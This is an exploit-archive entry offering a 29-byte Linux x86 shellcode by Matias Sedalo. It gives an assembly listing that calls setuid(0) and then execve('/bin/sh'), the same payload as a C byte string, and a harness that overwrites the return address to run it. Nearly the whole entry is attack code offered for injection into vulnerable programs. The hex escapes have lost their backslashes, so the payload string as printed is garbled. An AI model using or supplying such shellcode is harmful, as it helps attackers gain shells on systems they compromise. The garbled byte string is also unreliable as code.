linux/x86 execve /bin/sh 29 bytes

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : linux/x86 execve /bin/sh 29 bytes
# Published : 2004-09-12
# Author : Matias Sedalo
# Previous Title : linux/SPARC portbind port 8975 284 bytes
# Next Title : linux/x86 execve /bin/sh 24 bytes

/* 
  (c)1999-2003 Shellcode Research 
      http://www.shellcode.com.ar

   execve(/bin/sh) for linux x86
   29 bytes
   by Matias Sedalo

        xorl    %ebx, %ebx
        pushl   %ebx
        leal    0x17(%ebx),%eax
        int     $0x80
        cdq
        pushl   $0x68732f6e
        pushl   $0x69622f2f
        movl    %esp, %ebx
        pushl   %eax
        pushl   %ebx
        movl    %esp, %ecx
        movb    $0xb, %al
        int     $0x80
*/


char shellcode[] =
"x31xdbx53x8dx43x17xcdx80x99x68x6ex2fx73x68x68"
"x2fx2fx62x69x89xe3x50x53x89xe1xb0x0bxcdx80";

main() 
{
        int *ret;
        ret=(int *)&ret +2;
        printf("Shellcode lenght=%dn",strlen(shellcode));
        (*ret) = (int)shellcode;
}

// www.Syue.com [2004-09-12]